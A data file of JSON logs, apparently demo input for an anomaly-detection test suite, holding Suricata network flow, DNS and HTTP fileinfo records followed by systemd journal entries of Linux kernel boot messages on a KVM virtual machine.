{"timestamp":"2020-02-29T00:27:33.001064+0000","flow_id":385837024447768,"event_type":"flow","src_ip":"192.168.10.122","src_port":53767,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.888088+0000","end":"2020-02-29T00:22:32.999298+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:33.001283+0000","flow_id":1660149541607404,"event_type":"flow","src_ip":"192.168.10.81","src_port":53162,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":825,"bytes_toclient":648,"start":"2020-02-29T00:26:27.956396+0000","end":"2020-02-29T00:26:32.959944+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:33.001618+0000","flow_id":2245167021588029,"event_type":"flow","src_ip":"192.168.10.122","src_port":56092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.753213+0000","end":"2020-02-29T00:22:32.864442+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:34.000688+0000","flow_id":467437123496173,"event_type":"flow","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1004,"bytes_toclient":798,"start":"2020-02-29T00:26:27.944365+0000","end":"2020-02-29T00:26:33.119119+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:35.523857+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/attachment.png","state":"CLOSED","stored":false,"size":545,"tx_id":12}} {"timestamp":"2020-02-29T00:27:35.714780+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete-small.png","state":"CLOSED","stored":false,"size":124,"tx_id":14}} {"timestamp":"2020-02-29T00:27:36.344575+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38284,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:36.452597+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38284,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:36.452597+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38284,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:36.475284+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38285,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:27:36.583643+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38285,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:36.583643+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38285,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:37.000318+0000","event_type":"stats","stats":{"uptime":15309,"capture":{"kernel_packets":143203,"kernel_drops":0},"decoder":{"pkts":143205,"bytes":98434268,"invalid":196,"ipv4":141600,"ipv6":10,"ethernet":143205,"raw":0,"null":0,"sll":0,"tcp":135993,"udp":5396,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089280},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2936,"ssn_memcap_drop":0,"pseudo":357,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2952,"synack":2943,"rst":1227,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1934,"ftp":0,"smtp":0,"tls":793,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2469,"failed_udp":116},"tx":{"http":5096,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2553}},"flow_mgr":{"closed_pruned":2908,"new_pruned":17,"est_pruned":2557,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10560,"memcap_state":0,"memcap_global":0},"http":{"memuse":880,"memcap":0}}} logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/journal.log000066400000000000000000025216531500476301700320470ustar00rootroot00000000000000{ "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1;b=e2b08827b5804427b422c10c84f1567e;m=5580a6;t=5bd16dd19000e;x=c051adcbd24ec9d9", "__REALTIME_TIMESTAMP" : "1615280779886606", "__MONOTONIC_TIMESTAMP" : "5603494", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "MESSAGE" : "Linux version 4.15.0-60-generic (buildd@lgw01-amd64-030) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #67-Ubuntu SMP Thu Aug 22 16:55:30 UTC 2019 (Ubuntu 4.15.0-60.67-generic 4.15.18)", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2;b=e2b08827b5804427b422c10c84f1567e;m=5580ef;t=5bd16dd190056;x=6625bc488f616068", "__REALTIME_TIMESTAMP" : "1615280779886678", "__MONOTONIC_TIMESTAMP" : "5603567", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-60-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3;b=e2b08827b5804427b422c10c84f1567e;m=5580fc;t=5bd16dd190063;x=b9b11c44043d6efd", "__REALTIME_TIMESTAMP" : "1615280779886691", "__MONOTONIC_TIMESTAMP" : "5603580", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "KERNEL supported cpus:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4;b=e2b08827b5804427b422c10c84f1567e;m=558105;t=5bd16dd19006c;x=73e76d9bac5bf174", "__REALTIME_TIMESTAMP" : "1615280779886700", "__MONOTONIC_TIMESTAMP" : "5603589", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Intel GenuineIntel" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5;b=e2b08827b5804427b422c10c84f1567e;m=55810d;t=5bd16dd190075;x=e0fc2ab01305acb9", "__REALTIME_TIMESTAMP" : "1615280779886709", "__MONOTONIC_TIMESTAMP" : "5603597", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " AMD AuthenticAMD" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6;b=e2b08827b5804427b422c10c84f1567e;m=558116;t=5bd16dd19007d;x=2b216ce1cd7e969b", "__REALTIME_TIMESTAMP" : "1615280779886717", "__MONOTONIC_TIMESTAMP" : "5603606", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Centaur CentaurHauls" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7;b=e2b08827b5804427b422c10c84f1567e;m=558123;t=5bd16dd19008b;x=753688cca998c71f", "__REALTIME_TIMESTAMP" : "1615280779886731", "__MONOTONIC_TIMESTAMP" : "5603619", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8;b=e2b08827b5804427b422c10c84f1567e;m=55813c;t=5bd16dd1900a4;x=126a9f347823ed25", "__REALTIME_TIMESTAMP" : "1615280779886756", "__MONOTONIC_TIMESTAMP" : "5603644", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9;b=e2b08827b5804427b422c10c84f1567e;m=558146;t=5bd16dd1900ae;x=f3457b360b1dc2a1", "__REALTIME_TIMESTAMP" : "1615280779886766", "__MONOTONIC_TIMESTAMP" : "5603654", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a;b=e2b08827b5804427b422c10c84f1567e;m=558152;t=5bd16dd1900b9;x=5f0007f265216832", "__REALTIME_TIMESTAMP" : "1615280779886777", "__MONOTONIC_TIMESTAMP" : "5603666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b;b=e2b08827b5804427b422c10c84f1567e;m=55815b;t=5bd16dd1900c3;x=ac0b779e15c3e2e4", "__REALTIME_TIMESTAMP" : "1615280779886787", "__MONOTONIC_TIMESTAMP" : "5603675", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c;b=e2b08827b5804427b422c10c84f1567e;m=558178;t=5bd16dd1900df;x=83cffa4921471e01", "__REALTIME_TIMESTAMP" : "1615280779886815", "__MONOTONIC_TIMESTAMP" : "5603704", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: BIOS-provided physical RAM map:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d;b=e2b08827b5804427b422c10c84f1567e;m=558181;t=5bd16dd1900e8;x=3d6809c19f32501", "__REALTIME_TIMESTAMP" : "1615280779886824", "__MONOTONIC_TIMESTAMP" : "5603713", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e;b=e2b08827b5804427b422c10c84f1567e;m=55818a;t=5bd16dd1900f1;x=86babca894ceac2f", "__REALTIME_TIMESTAMP" : "1615280779886833", "__MONOTONIC_TIMESTAMP" : "5603722", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f;b=e2b08827b5804427b422c10c84f1567e;m=558196;t=5bd16dd1900fe;x=9b0dc0acf836acae", "__REALTIME_TIMESTAMP" : "1615280779886846", "__MONOTONIC_TIMESTAMP" : "5603734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10;b=e2b08827b5804427b422c10c84f1567e;m=5581a3;t=5bd16dd19010a;x=dc8c8f4c503ce77c", "__REALTIME_TIMESTAMP" : "1615280779886858", "__MONOTONIC_TIMESTAMP" : "5603747", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x0000000000100000-0x000000007ffdbfff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11;b=e2b08827b5804427b422c10c84f1567e;m=5581b5;t=5bd16dd19011c;x=d98108b0778208d0", "__REALTIME_TIMESTAMP" : "1615280779886876", "__MONOTONIC_TIMESTAMP" : "5603765", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x000000007ffdc000-0x000000007fffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12;b=e2b08827b5804427b422c10c84f1567e;m=5581c3;t=5bd16dd19012a;x=243e15a620c43f41", "__REALTIME_TIMESTAMP" : "1615280779886890", "__MONOTONIC_TIMESTAMP" : "5603779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000feffc000-0x00000000feffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13;b=e2b08827b5804427b422c10c84f1567e;m=5581cc;t=5bd16dd190134;x=9df9e25b4913d3c5", "__REALTIME_TIMESTAMP" : "1615280779886900", "__MONOTONIC_TIMESTAMP" : "5603788", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14;b=e2b08827b5804427b422c10c84f1567e;m=5581d5;t=5bd16dd19013d;x=36b965c29ff40590", "__REALTIME_TIMESTAMP" : "1615280779886909", "__MONOTONIC_TIMESTAMP" : "5603797", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "NX (Execute Disable) protection: active" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15;b=e2b08827b5804427b422c10c84f1567e;m=5581de;t=5bd16dd190146;x=c6690de411e5df17", "__REALTIME_TIMESTAMP" : "1615280779886918", "__MONOTONIC_TIMESTAMP" : "5603806", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "SMBIOS 2.8 present." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16;b=e2b08827b5804427b422c10c84f1567e;m=5581e7;t=5bd16dd19014f;x=c4fdbca5419d55f3", "__REALTIME_TIMESTAMP" : "1615280779886927", "__MONOTONIC_TIMESTAMP" : "5603815", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "DMI: OpenStack Foundation OpenStack Nova, BIOS 1.10.2-1ubuntu1 04/01/2014" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17;b=e2b08827b5804427b422c10c84f1567e;m=5581f3;t=5bd16dd19015a;x=de982aa3b245a14a", "__REALTIME_TIMESTAMP" : "1615280779886938", "__MONOTONIC_TIMESTAMP" : "5603827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Hypervisor detected: KVM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18;b=e2b08827b5804427b422c10c84f1567e;m=5581fc;t=5bd16dd190164;x=a542e74c0abd30a6", "__REALTIME_TIMESTAMP" : "1615280779886948", "__MONOTONIC_TIMESTAMP" : "5603836", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "e820: update [mem 0x00000000-0x00000fff] usable ==> reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19;b=e2b08827b5804427b422c10c84f1567e;m=558205;t=5bd16dd19016d;x=f6828ca424fd1ccb", "__REALTIME_TIMESTAMP" : "1615280779886957", "__MONOTONIC_TIMESTAMP" : "5603845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "e820: remove [mem 0x000a0000-0x000fffff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a;b=e2b08827b5804427b422c10c84f1567e;m=55820f;t=5bd16dd190176;x=1ddef7fd13afc6c9", "__REALTIME_TIMESTAMP" : "1615280779886966", "__MONOTONIC_TIMESTAMP" : "5603855", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: last_pfn = 0x7ffdc max_arch_pfn = 0x400000000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b;b=e2b08827b5804427b422c10c84f1567e;m=558217;t=5bd16dd19017f;x=b37967a7d5978781", "__REALTIME_TIMESTAMP" : "1615280779886975", "__MONOTONIC_TIMESTAMP" : "5603863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR default type: write-back" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c;b=e2b08827b5804427b422c10c84f1567e;m=558220;t=5bd16dd190188;x=59ac1a4d33299f29", "__REALTIME_TIMESTAMP" : "1615280779886984", "__MONOTONIC_TIMESTAMP" : "5603872", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR fixed ranges enabled:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d;b=e2b08827b5804427b422c10c84f1567e;m=558229;t=5bd16dd190191;x=dbfd08ab63661380", "__REALTIME_TIMESTAMP" : "1615280779886993", "__MONOTONIC_TIMESTAMP" : "5603881", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 00000-9FFFF write-back" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e;b=e2b08827b5804427b422c10c84f1567e;m=558232;t=5bd16dd190199;x=8e640bc12038fc0", "__REALTIME_TIMESTAMP" : "1615280779887001", "__MONOTONIC_TIMESTAMP" : "5603890", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 